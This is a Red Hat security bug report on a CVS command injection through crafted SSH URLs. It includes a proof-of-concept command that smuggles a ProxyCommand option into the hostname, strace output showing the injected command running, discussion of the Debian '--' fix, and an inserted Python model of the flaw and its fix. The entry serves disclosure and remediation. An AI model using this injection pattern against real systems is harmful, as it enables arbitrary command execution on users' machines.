Bug 1480800 - (CVE-2017-12836) CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Product: Security Response
Classification: Other
Component: vulnerability
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
: Security
Depends On: 1480801
Blocks: 1480802 1485460
Reported: 2017-08-11 18:22 EDT by Adam Mariš
Modified: 2017-08-25 15:38 EDT (History)

Last Closed: 2017-08-22 09:35:08 EDT

Attachments
Fix ported to 1.11.23 (1.73 KB, patch)
2017-08-14 05:07 EDT, Petr Pisar

Description Adam Mariš 2017-08-11 18:22:01 EDT
Command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.


Comment 1 Adam Mariš 2017-08-11 18:22:23 EDT
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]
Comment 2 Petr Pisar 2017-08-14 04:25:32 EDT

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.
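The argument injection shown in the strace above, and the effect of the "--" that the Debian fix inserts before the hostname, modelled as an added Python example (this is illustration code written for this page, not code from the CVS project, the Debian patch or this bug report). It assumes a simplified CVSROOT grammar of [:method:][user@]host:/path with rsh/ext as the default transport, and `model_ssh_parse` is a toy approximation of an ssh-like client's option handling (only `-oKey=Value` options are modelled), not OpenSSH's actual parser. The hostname allow-list in `is_safe_hostname` is a defence-in-depth check added here, not part of the fix discussed in the comment.

```python
"""Added example (not from the CVS project or this bug report): models why a
hostname taken from a cvs -d root must be separated from $CVS_RSH options
with "--", as the Debian fix referenced in comment 2 does."""
import re
from typing import Dict, List, Tuple


def parse_cvsroot(root: str) -> Tuple[str, str, str]:
    """Split a remote CVSROOT of the form [:method:][user@]host:/path.

    Assumption: a root with no leading ':method:' uses the rsh/ext transport,
    which is what makes 'host:/bar' in the strace above reach $CVS_RSH.
    """
    method, rest = "ext", root
    if rest.startswith(":"):
        _, method, rest = rest.split(":", 2)
    if ":" not in rest:
        raise ValueError("local root, no remote host: %r" % root)
    host, path = rest.split(":", 1)
    if "@" in host:
        host = host.rsplit("@", 1)[1]
    return method, host, path


def rsh_argv_before_fix(rsh: str, host: str, remote_cmd: str) -> List[str]:
    # Pre-fix shape seen in the strace: the hostname goes straight after argv[0],
    # so a hostname beginning with "-" is consumed by ssh as an option.
    return [rsh, host, remote_cmd]


def rsh_argv_after_fix(rsh: str, host: str, remote_cmd: str) -> List[str]:
    # Shape with the Debian fix: "--" terminates option parsing, so the next
    # argument is always taken as the hostname, whatever it starts with.
    return [rsh, "--", host, remote_cmd]


def model_ssh_parse(argv: List[str]) -> Tuple[Dict[str, str], str, str]:
    """Toy model of how an ssh-like client reads its argv (assumption: an
    approximation for illustration, not OpenSSH's parser).

    Arguments before the first non-option or "--" are options; only the
    '-oKey=Value' form is modelled. The next argument is the host and the
    remainder is the remote command.
    """
    options: Dict[str, str] = {}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "--":
            i += 1
            break
        if arg.startswith("-o") and "=" in arg:
            key, value = arg[2:].split("=", 1)
            options[key] = value
            i += 1
            continue
        if arg.startswith("-"):
            raise ValueError("option not modelled: %r" % arg)
        break
    if i >= len(argv):
        raise ValueError("no hostname in argv")
    host = argv[i]
    remote_cmd = " ".join(argv[i + 1:])
    return options, host, remote_cmd


_HOST_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$")


def is_safe_hostname(host: str) -> bool:
    """Defence in depth alongside "--": accept only hostnames that cannot be
    read as an option (no leading "-") and contain only DNS label characters."""
    return bool(_HOST_RE.match(host))


if __name__ == "__main__":
    root = "-oProxyCommand=id;localhost:/bar"   # the -d root from comment 2
    _, host, _ = parse_cvsroot(root)
    for build in (rsh_argv_before_fix, rsh_argv_after_fix):
        argv = build("/usr/bin/ssh", host, "cvs server")
        print(argv, "->", model_ssh_parse(argv))
    print("safe hostname:", is_safe_hostname(host))
```

Run stand-alone, the pre-fix argv yields a ProxyCommand option with value `id;localhost` and `cvs server` mistaken for the hostname, matching the strace; the post-fix argv yields no options and the whole `-o...` string as the hostname, which then simply fails to resolve. Rejecting such hostnames up front with `is_safe_hostname` turns the failure into a clear error before any `$CVS_RSH` process is started.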
Comment 3 Petr Pisar 2017-08-14 05:07 EDT
Created attachment 1313002 [details]
Fix ported to 1.11.23
Comment 4 Stefan Cornelius 2017-08-15 05:21:08 EDT
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.
Comment 5 Stefan Cornelius 2017-08-22 09:35:15 EDT

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
